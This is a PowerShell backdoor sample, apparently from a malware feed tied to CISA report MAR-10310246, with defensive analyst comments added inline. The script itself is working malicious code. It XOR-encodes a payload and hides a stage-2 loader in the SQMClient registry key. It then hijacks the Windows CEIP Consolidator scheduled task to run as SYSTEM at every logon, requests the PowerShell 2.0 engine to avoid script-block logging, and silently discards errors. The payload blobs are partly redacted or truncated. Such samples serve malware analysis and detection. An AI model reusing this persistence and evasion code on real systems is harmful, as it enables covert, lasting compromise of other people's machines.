Malware-Feed/2020.10.29_CISA-MAR-10310246_Powershell_Backdoor/134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8

# Analyst annotation (defensive): PowerShell stage of the backdoor described in
# CISA MAR-10310246. Two functions are defined and then invoked by the trailing
# top-level statements; host artifacts the script leaves behind are noted inline.
# NOTE(review): the two leading replacement characters are most likely a byte-order
# mark that did not survive the display encoding, not part of the script -- confirm
# against the raw sample.
#
# TVM730egf: builds a random identifier (2-3 uppercase letters, then 2-3 digits,
# then 2-3 letters from a-j) that is not already in $GP50afa, appends it to the
# list and returns both the name and the updated list. Used further down to mint
# throwaway variable names for the generated stage-2 script, so those names differ
# per install and are not useful as static indicators.
# NOTE(review): Get-RandomVar (collision branch) is not defined anywhere in this
# view; presumably meant to re-enter this function -- confirm against the full sample.
<EFBFBD><EFBFBD>function TVM730egf([string[]]$GP50afa) { $UC33gfa = ((1..(Get-Random -Min 2 -Max 4) | % {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join '');
$EQ33abh = ((1..(Get-Random -Min 2 -Max 4) | % {[Char](Get-Random -Min 0x30 -Max 0x3A)}) -join '');
$OFK689fa = ((1..(Get-Random -Min 2 -Max 4) | % {[Char](Get-Random -Min 0x61 -Max 0x6B)}) -join '');
$TTG32aa = $UC33gfa + $EQ33abh + $OFK689fa;
if($GP50afa -contains $TTG32aa){$TTG32aa = Get-RandomVar $GP50afa;
} $GP50afa += $TTG32aa;
return $TTG32aa, $GP50afa;
# PAZ488af: installs persistence. $BRK627db is the on-disk scheduled-task XML to
# hijack and $IJV434ghf the Task Scheduler folder it belongs to. The whole body
# runs inside one try/catch that swallows every error, so a failed install leaves
# no message behind.
} function PAZ488af { param([string]$BRK627db, [string]$IJV434ghf) try { $KXI603eh = New-Object -ComObject('Schedule.Service');
$KXI603eh.connect('localhost');
$LM625cbg = $KXI603eh.GetFolder($IJV434ghf);
$ZH626hg = $KXI603eh.NewTask($null);
# A temp file is created and immediately deleted; only its random name is kept.
# NOTE(review): $VD295gbh is not referenced again anywhere in this view.
[string]$SV557ebg = [System.IO.Path]::GetTempFileName();
Remove-Item -Path $SV557ebg -Force;
[string]$VD295gbh = [System.IO.Path]::GetFileName($SV557ebg);
# Compiles a small C# helper (base64 below) with Add-Type. The decoded source
# defines RZP645be.XD014ic(byte[] data, byte[] key): a repeating-key XOR over the
# input. Add-Type with inline source typically spawns the C# compiler from the
# PowerShell process, which is a detection opportunity on its own.
$PS061hh = New-Object System.Text.ASCIIEncoding;
$HZ96da = [Convert]::FromBase64String("cHVibGljIHN0YXRpYyBjbGFzcyBSWlA2NDViZXtwdWJsaWMgc3RhdGljIGJ5dGVbXSBYRDAxNGljKGJ5dGVbXSBpbmNvbWVfYnl0ZXMsIGJ5dGVbXSBnYW1tYSl7Ynl0ZVtdIG91dHB1dCA9IG5ldyBieXRlW2luY29tZV9ieXRlcy5MZW5ndGhdO2ZvciAoaW50IGkgPSAwOyBpIDwgaW5jb21lX2J5dGVzLkxlbmd0aDsgKytpKXtvdXRwdXRbaV0gPSAoYnl0ZSkoaW5jb21lX2J5dGVzW2ldIF4gZ2FtbWFbaSAlIGdhbW1hLkxlbmd0aF0pO31yZXR1cm4gb3V0cHV0O319");
$VTC52ii = $PS061hh.GetString($HZ96da, 0, $HZ96da.Length);
try{ Add-Type $VTC52ii -erroraction 'silentlycontinue' } catch{ return;
# Two encoded payload blobs follow: $TEX262hh (redacted in this copy) and $MO67cc
# (truncated in this copy; its leading "H4sI" is the base64 of a gzip header, so
# the payload is presumably compressed -- confirm). One of the two is selected
# further down by [IntPtr]::Size, i.e. 32- vs 64-bit process.
} $TEX262hh = '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
$HT29hh = [Convert]::FromBase64String($TEX262hh);
$MO67cc = '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
$PVU468aa = [Convert]::FromBase64String($MO67cc);
# Per-install random key: 8-9 chars from ':'..'Z', then 5-7 digits, then 8-9
# lowercase letters. The payload is XOR-ed with it below and the key itself is
# only ever written into the task's Arguments, so recovering the payload from a
# host needs both the registry value and the task XML.
$GS459ea = "$((1..(Get-Random -Min 8 -Max 10) | % {[Char](Get-Random -Min 0x3A -Max 0x5B)}) -join '')$((1..(Get-Random -Min 5 -Max 8) | % {[Char](Get-Random -Min 0x30 -Max 0x3A)}) -join '')$((1..(Get-Random -Min 8 -Max 10) | %{[Char](Get-Random -Min 0x61 -Max 0x7B)}) -join '')";
# Re-encode both payload variants under the fresh key (XD014ic cycles the key).
[byte[]]$JQ587aa = [RZP645be]::XD014ic($HT29hh, $PS061hh.GetBytes($GS459ea));
[byte[]]$QIG418ba = [RZP645be]::XD014ic($PVU468aa, $PS061hh.GetBytes($GS459ea));
$AT85ced = [Convert]::ToBase64String($JQ587aa);
$ARO88iab = [Convert]::ToBase64String($QIG418ba);
# Mint ten random variable names for the stage-2 script. $PS061hh, $HZ96da and
# $VTC52ii are reused as name holders here, shadowing the encoder object and
# helper source used above (the code below switches to [Text.Encoding]::ASCII).
$VP96hb = @();
[string]$PS061hh, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$RPW45dij, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$RIZ505ia, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$HZ96da, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$VTC52ii, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$EQN37bdi, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$MLJ011hei, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$ZFR897jhg, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$LEJ66ih, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$MP722jg, [string[]]$VP96hb = TVM730egf $VP96hb;
# Storage location for the stage-2 script and for the hijacked task's original
# settings. The values written under it below (WSqmCons, WSqmConBak, WSqmConBin,
# WSqmConHex) are the registry indicators for this sample; verify against a
# clean baseline, since the legitimate SQMClient key is not expected to carry them.
$MP722jg = "HKLM:\SOFTWARE\Microsoft\SQMClient\Windows";
# Choose the 32-bit or 64-bit payload variant by the pointer size of this process.
if([System.IntPtr]::Size -eq 4) { $HQO388ea = $AT85ced;
} else { $HQO388ea = $ARO88iab;
# Stage-2 script text (one double-quoted string running to the closing quote
# below; backtick-escaped `$ keeps the minted names literal). When executed it
# sets a PSBreakpoint on a dummy variable (purpose unclear -- possibly an
# anti-analysis quirk, confirm), compiles two C# helpers (the second,
# TUU88aae::IHF638jib, is redacted in this copy and presumably inflates the
# gzip blob), XOR-decodes the chosen payload with the key received in $GS459ea,
# and passes the plaintext to Invoke-Expression.
} $MTC584bb = "Set-PSBreakpoint -Variable luis_armstrong -Mode Write;
`$$PS061hh = New-Object System.Text.ASCIIEncoding;
`$$RPW45dij = [Convert]::FromBase64String('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');
`$$RIZ505ia = `$$PS061hh.GetString(`$$RPW45dij, 0, `$$RPW45dij.Length);
try{ Add-Type `$$RIZ505ia -erroraction 'silentlycontinue' }catch{ return;
}`$$HZ96da = [Convert]::FromBase64String('cHVibGljIHN0YXRpYyBjbGFzcyBSWlA2NDViZXtwdWJsaWMgc3RhdGljIGJ5dGVbXSBYRDAxNGljKGJ5dGVbXSBpbmNvbWVfYnl0ZXMsIGJ5dGVbXSBnYW1tYSl7Ynl0ZVtdIG91dHB1dCA9IG5ldyBieXRlW2luY29tZV9ieXRlcy5MZW5ndGhdO2ZvciAoaW50IGkgPSAwOyBpIDwgaW5jb21lX2J5dGVzLkxlbmd0aDsgKytpKXtvdXRwdXRbaV0gPSAoYnl0ZSkoaW5jb21lX2J5dGVzW2ldIF4gZ2FtbWFbaSAlIGdhbW1hLkxlbmd0aF0pO31yZXR1cm4gb3V0cHV0O319');
`$$VTC52ii = `$$PS061hh.GetString(`$$HZ96da, 0, `$$HZ96da.Length);
try{ Add-Type `$$VTC52ii -erroraction 'silentlycontinue' }catch{ return;
}`$$EQN37bdi = `"$HQO388ea`";
`$$MLJ011hei = [Convert]::FromBase64String(`$$EQN37bdi);
`$$ZFR897jhg = [RZP645be]::XD014ic(`$$MLJ011hei, `$$PS061hh.GetBytes(`$GS459ea));
`$$ZFR897jhg = [TUU88aae]::IHF638jib(`$$ZFR897jhg);
`$$LEJ66ih = `$$PS061hh.GetString(`$$ZFR897jhg, 0, `$$ZFR897jhg.Length);
iex `$$LEJ66ih;
";
# Persist the stage-2 script, base64-encoded, as the WSqmCons value.
Set-ItemProperty -Path $MP722jg -Name "WSqmCons" -Value ([Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes($MTC584bb)));
# If the task XML file is missing, restore it from the copy saved under
# WSqmConBak by an earlier run; with no backup available the install aborts.
if(-not(Test-Path($BRK627db))) { $SYL376baa = (Get-ItemProperty -Path $MP722jg).WSqmConBak;
if ($SYL376baa.Length -eq 0){"Fatal error";
return;
} Set-Content -Path $BRK627db -Value $SYL376baa -Encoding Byte;
# Parse the current task XML and back up its raw bytes to WSqmConBak.
} $JLF41fe = Get-Item $BRK627db;
[xml]$SYL376baa = Get-Content $JLF41fe.FullName;
[byte[]]$JP844baj = Get-Content $JLF41fe.FullName -encoding Byte;
Set-ItemProperty -Path $MP722jg -Name "WSqmConBak" -Value $JP844baj;
# Ensure the task has an enabled LogonTrigger so the payload runs at each logon.
$IKO451jga = $SYL376baa.Task.Triggers.LogonTrigger;
if ("$IKO451jga" -eq "") { $IKO451jga = $SYL376baa.CreateElement('LogonTrigger', $SYL376baa.Task.NamespaceURI);
$RQT625fhi = $SYL376baa.CreateElement('Enabled', $SYL376baa.Task.NamespaceURI);
$RQT625fhi.InnerText = "true";
$IKO451jga.AppendChild($RQT625fhi);
$SYL376baa.Task.Triggers.AppendChild($IKO451jga);
# Hijack the task's action. On first run the original Command/Arguments are
# saved to WSqmConBin/WSqmConHex; on a re-run (Command already cmd.exe) they
# are reloaded from there. The action becomes cmd.exe running the original
# command first and then the launcher, so the task keeps its legitimate
# behaviour and only the <Exec> element betrays the change.
} $DL70iff = $SYL376baa.Task.Actions.Exec.Command;
$YC95gfd = $SYL376baa.Task.Actions.Exec.Arguments;
if("$DL70iff" -ne "cmd.exe") { Set-ItemProperty -Path $MP722jg -Name "WSqmConBin" -Value $DL70iff;
$SYL376baa.Task.Actions.Exec.Command = 'cmd.exe';
if("$YC95gfd" -eq "") { $SYL376baa.Task.Actions.Exec.AppendChild($SYL376baa.CreateElement('Arguments', $SYL376baa.Task.NamespaceURI));
} else { Set-ItemProperty -Path $MP722jg -Name "WSqmConHex" -Value $YC95gfd;
} } else { $DL70iff = (Get-ItemProperty -Path $MP722jg).WSqmConBin;
$YC95gfd = (Get-ItemProperty -Path $MP722jg).WSqmConHex;
} if("$YC95gfd" -ne ""){$YC95gfd += " "};
# Launcher placed into the task's Arguments: passes the key, reads WSqmCons
# from the registry, decodes it and feeds it to Invoke-Expression. The method
# name is split with backticks (Fr`omBa`se6`4Str`ing) so the literal
# "FromBase64String" never appears in the task XML. What does remain in the
# command line -- "powershell.exe -v 2" (a request for the 2.0 engine, which
# lacks script-block logging) plus the WSqmCons value name -- is useful for
# hunting across scheduled-task definitions and process-creation logs.
$ME920bh = "`$GS459ea = '$GS459ea';
[Text.Encoding]::ASCII.GetString([Convert]::\`"Fr``omBa``se6``4Str``ing\`"((gp $MP722jg).WSqmCons))|iex;
";
# New action: cmd.exe /c "<original command> <original args>& powershell.exe -v 2 "<launcher>"".
$SYL376baa.Task.Actions.Exec.Arguments = " /c `"" + $DL70iff + " " + $YC95gfd + "& powershell.exe -v 2 `"$ME920bh`"`"";
# Register the modified definition over the existing task as SYSTEM
# (6 = TASK_CREATE_OR_UPDATE, 5 = TASK_LOGON_SERVICE_ACCOUNT).
$ZH626hg.XmlText = $SYL376baa.OuterXml;
$LM625cbg.RegisterTaskDefinition($JLF41fe.Name, $ZH626hg, 6, 'SYSTEM', $null, 5);
# Every error above is swallowed silently.
} catch{} Sleep 1;
# After a 1 s pause the launcher is run once immediately, with the same command
# line the task will use on subsequent logons.
$(powershell.exe -v 2 "`$GS459ea = '$GS459ea';
[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp $MP722jg).WSqmCons))|iex") } Write-Host "= $XX93ieg =";
# Top-level driver. NOTE(review): $XX93ieg is never assigned in this view --
# presumably a script parameter or outer-scope variable set by the dropper.
# "reset" mode walks every loaded user hive (SID-named keys under HKU) and, for
# each one that has a per-user WINEVT Publishers\{cabe18a5-...}\ChannelReferences\0
# key, prints its "pdk" value and deletes the key. Any other value just prints 'Normal'.
if ($XX93ieg -eq "reset"){Write-Output 'Reset';
New-PSDrive -Name HKU -PSProvider Registry -Root Registry::HKEY_USERS | Out-Null;
Foreach($AI66gg in $(Get-ChildItem HKU: | %{if($_.Name -match 'S-\d-\d+-(\d+-){1,14}\d+$'){$Matches[0]}})){$RZB046fcb = "HKU:\$AI66gg\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{cabe18a5-69b9-4eec-bed0-fa080ed05a3b}\ChannelReferences\0";
if (Test-Path $RZB046fcb){Get-Item $RZB046fcb;
$((gp $RZB046fcb).pdk) -join ' ';
Write-Host "Remove $RZB046fcb";
Remove-Item -Path $RZB046fcb -Force;
# In both modes the machine-wide marker key under HKLM ...\WINEVT\Publishers\
# {cabe18a5-69b9-4eec-bed0-fa080ed05a3b}\ChannelReferences\0 is (re)created with
# string values N and S holding fixed tokens; the GUID path and the two values
# appear to be static indicators of this sample.
}}} else{Write-Output 'Normal'} New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{cabe18a5-69b9-4eec-bed0-fa080ed05a3b}\ChannelReferences\0" -Force | Out-Null;
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{cabe18a5-69b9-4eec-bed0-fa080ed05a3b}\ChannelReferences\0" -Name "N" -PropertyType String -Value RTXQ34741eaf | Out-Null;
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{cabe18a5-69b9-4eec-bed0-fa080ed05a3b}\ChannelReferences\0" -Name "S" -PropertyType String -Value ZYYM067dijgg | Out-Null;
# Install persistence into the real CEIP Consolidator task (file path and Task
# Scheduler folder below), then remove the dropper's temporary file.
PAZ488af 'C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator' 'Microsoft\Windows\Customer Experience Improvement Program';
Remove-Item 'C:\Windows\Temp\tmp4071.tmp'